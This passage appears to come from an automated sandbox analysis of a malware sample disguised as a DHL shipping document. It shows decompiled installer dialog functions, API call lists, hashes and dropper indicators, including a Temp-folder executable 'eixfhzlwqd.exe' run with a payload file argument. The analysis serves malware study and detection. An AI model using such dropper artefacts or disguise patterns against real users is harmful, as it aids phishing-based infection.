                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                              • String ID:
                                                              • API String ID: 2972824698-0
                                                              • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                              • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                              • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                              • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 95%
                                                              			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                              0x00405811
                                                              0x00405817
                                                              0x00405821
                                                              0x00405824
                                                              0x004059ba
                                                              0x004059de
                                                              0x004059de
                                                              0x004059f1
                                                              0x00405a0f
                                                              0x00405a11
                                                              0x00405a19
                                                              0x00405a6f
                                                              0x00405a73
                                                              0x00000000
                                                              0x00000000
                                                              0x00405a75
                                                              0x00405a7b
                                                              0x00000000
                                                              0x00000000
                                                              0x00405a85
                                                              0x00405a8d
                                                              0x00405a90
                                                              0x00405b92
                                                              0x00000000
                                                              0x00405b92
                                                              0x00405a9f
                                                              0x00405aaa
                                                              0x00405ab3
                                                              0x00405abe
                                                              0x00405ac1
                                                              0x00405aca
                                                              0x00405ad0
                                                              0x00405ad3
                                                              0x00405ad3
                                                              0x00405aeb
                                                              0x00405af4
                                                              0x00405af7
                                                              0x00405afe
                                                              0x00405b05
                                                              0x00405b0d
                                                              0x00405b0d
                                                              0x00405b24
                                                              0x00405b24
                                                              0x00405b2b
                                                              0x00405b31
                                                              0x00405b3d
                                                              0x00405b44
                                                              0x00405b4d
                                                              0x00405b4f
                                                              0x00405b52
                                                              0x00405b61
                                                              0x00405b64
                                                              0x00405b6a
                                                              0x00405b6b
                                                              0x00405b71
                                                              0x00405b72
                                                              0x00405b73
                                                              0x00405b7b
                                                              0x00405b86
                                                              0x00405b8c
                                                              0x00405b8c
                                                              0x00000000
                                                              0x00405aeb
                                                              0x00405a21
                                                              0x00405a51
                                                              0x00405a59
                                                              0x00405a64
                                                              0x00405a64
                                                              0x00405a6a
                                                              0x00000000
                                                              0x00405a6a
                                                              0x00405a25
                                                              0x00405a2f
                                                              0x00000000
                                                              0x004059f3
                                                              0x004059f9
                                                              0x00405a34
                                                              0x00000000
                                                              0x00405a3d
                                                              0x00405a02
                                                              0x00405a07
                                                              0x00405a0a
                                                              0x00000000
                                                              0x00405a0a
                                                              0x004059f1
                                                              0x0040582a
                                                              0x0040582e
                                                              0x00405836
                                                              0x0040583a
                                                              0x0040583d
                                                              0x00405840
                                                              0x00405843
                                                              0x00405846
                                                              0x00405847
                                                              0x00405848
                                                              0x00405861
                                                              0x00405864
                                                              0x0040586e
                                                              0x0040587d
                                                              0x00405885
                                                              0x0040588d
                                                              0x00405892
                                                              0x00405895
                                                              0x004058a1
                                                              0x004058aa
                                                              0x004058b3
                                                              0x004058d5
                                                              0x004058db
                                                              0x004058ec
                                                              0x004058f1
                                                              0x004058ff
                                                              0x0040590d
                                                              0x0040590d
                                                              0x00405912
                                                              0x00405920
                                                              0x00405920
                                                              0x00405925
                                                              0x00405928
                                                              0x0040592d
                                                              0x00405939
                                                              0x00405942
                                                              0x0040594f
                                                              0x0040595e
                                                              0x00405951
                                                              0x00405956
                                                              0x00405956
                                                              0x0040596a
                                                              0x0040596a
                                                              0x0040597e
                                                              0x00405987
                                                              0x00405990
                                                              0x004059a0
                                                              0x004059ac
                                                              0x004059ac
                                                              0x00000000

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 00405867
                                                              • GetDlgItem.USER32 ref: 00405876
                                                              • GetClientRect.USER32 ref: 004058B3
                                                              • GetSystemMetrics.USER32 ref: 004058BA
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                              • ShowWindow.USER32(?,00000008), ref: 00405956
                                                              • GetDlgItem.USER32 ref: 00405977
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                              • GetDlgItem.USER32 ref: 00405885
                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                              • GetDlgItem.USER32 ref: 004059C9
                                                              • CreateThread.KERNEL32 ref: 004059D7
                                                              • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                              • ShowWindow.USER32(00000000), ref: 00405A02
                                                              • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                              • ShowWindow.USER32(00000008), ref: 00405A51
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                              • CreatePopupMenu.USER32 ref: 00405A96
                                                              • AppendMenuW.USER32 ref: 00405AAA
                                                              • GetWindowRect.USER32 ref: 00405ACA
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                              • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                              • EmptyClipboard.USER32 ref: 00405B31
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                              • GlobalLock.KERNEL32 ref: 00405B47
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                              • SetClipboardData.USER32 ref: 00405B86
                                                              • CloseClipboard.USER32 ref: 00405B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: H7B${
                                                              • API String ID: 590372296-2256286769
                                                              • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                              • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                              • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                              • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                              0x00404ab5
                                                              0x00404abb
                                                              0x00404ac1
                                                              0x00404ace
                                                              0x00404adc
                                                              0x00404adf
                                                              0x00404ae7
                                                              0x00404aed
                                                              0x00404aed
                                                              0x00404af9
                                                              0x00404afc
                                                              0x00404b6a
                                                              0x00404b71
                                                              0x00404c48
                                                              0x00404c4f
                                                              0x00404c5e
                                                              0x00404c5e
                                                              0x00404c62
                                                              0x00404c6c
                                                              0x00404c79
                                                              0x00404c7b
                                                              0x00404c7b
                                                              0x00404c89
                                                              0x00404c90
                                                              0x00404c97
                                                              0x00404c9a
                                                              0x00404cd6
                                                              0x00404cd8
                                                              0x00404cde
                                                              0x00404ce3
                                                              0x00404ce7
                                                              0x00404ce9
                                                              0x00404ce9
                                                              0x00404d05
                                                              0x00000000
                                                              0x00404d07
                                                              0x00404d0a
                                                              0x00404d18
                                                              0x00404d1e
                                                              0x00404d1f
                                                              0x00404d22
                                                              0x00404d25
                                                              0x00000000
                                                              0x00404d25
                                                              0x00404c9c
                                                              0x00404c9e
                                                              0x00404ca2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404ca4
                                                              0x00404ca4
                                                              0x00404cb1
                                                              0x00404cb6
                                                              0x00000000
                                                              0x00000000
                                                              0x00404cba
                                                              0x00404cbc
                                                              0x00404cbc
                                                              0x00404cc5
                                                              0x00404cc7
                                                              0x00404ccc
                                                              0x00404ccf
                                                              0x00404cd4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404cd4
                                                              0x00404d31
                                                              0x00404d3b
                                                              0x00404d3e
                                                              0x00404d41
                                                              0x00404d48
                                                              0x00404d48
                                                              0x00404d4a
                                                              0x00404d4a
                                                              0x00404d4f
                                                              0x00404d51
                                                              0x00404d59
                                                              0x00404d60
                                                              0x00404d62
                                                              0x00404d6d
                                                              0x00404d6d
                                                              0x00404d62
                                                              0x00404d7d
                                                              0x00404d87
                                                              0x00404d8f
                                                              0x00404daa
                                                              0x00404d91
                                                              0x00404d9a
                                                              0x00404d9a
                                                              0x00404d8f
                                                              0x00404daf
                                                              0x00404db4
                                                              0x00404db9
                                                              0x00404dc2
                                                              0x00404dc2
                                                              0x00404dcb
                                                              0x00404dcd
                                                              0x00404dcd
                                                              0x00404dd9
                                                              0x00404de1
                                                              0x00404deb
                                                              0x00404deb
                                                              0x00404df0
                                                              0x00000000
                                                              0x00404df0
                                                              0x00404c9a
                                                              0x00404c51
                                                              0x00404c58
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404c58
                                                              0x00404b77
                                                              0x00404b80
                                                              0x00404b9a
                                                              0x00404b9f
                                                              0x00404ba9
                                                              0x00404bb0
                                                              0x00404bbc
                                                              0x00404bbf
                                                              0x00404bc2
                                                              0x00404bc9
                                                              0x00404bd1
                                                              0x00404bd4
                                                              0x00404bd8
                                                              0x00404bdf
                                                              0x00404be7
                                                              0x00404c41
                                                              0x00404be9
                                                              0x00404bea
                                                              0x00404bf1
                                                              0x00404bfb
                                                              0x00404c03
                                                              0x00404c10
                                                              0x00404c24
                                                              0x00404c28
                                                              0x00404c28
                                                              0x00404c24
                                                              0x00404c2d
                                                              0x00404c3a
                                                              0x00404c3a
                                                              0x00404be7
                                                              0x00000000
                                                              0x00404b9f
                                                              0x00404b8d
                                                              0x00000000
                                                              0x00000000
                                                              0x00404b93
                                                              0x00000000
                                                              0x00404afe
                                                              0x00404b0b
                                                              0x00404b14
                                                              0x00404b21
                                                              0x00404b21
                                                              0x00404b28
                                                              0x00404b2e
                                                              0x00404b37
                                                              0x00404b3a
                                                              0x00404b3d
                                                              0x00404b45
                                                              0x00404b48
                                                              0x00404b4b
                                                              0x00404b51
                                                              0x00404b58
                                                              0x00404b5f
                                                              0x00404df6
                                                              0x00404e08
                                                              0x00404b65
                                                              0x00404b68
                                                              0x00000000
                                                              0x00404b68
                                                              0x00404b5f

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 00404B04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                              • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00423748,00000000,?,?), ref: 00404C1C
                                                              • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy), ref: 00404C28
                                                              • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy$A$C:\Users\user\AppData\Local\Temp$H7B
                                                              • API String ID: 2624150263-4216473286
                                                              • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                              • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                              • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                              • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

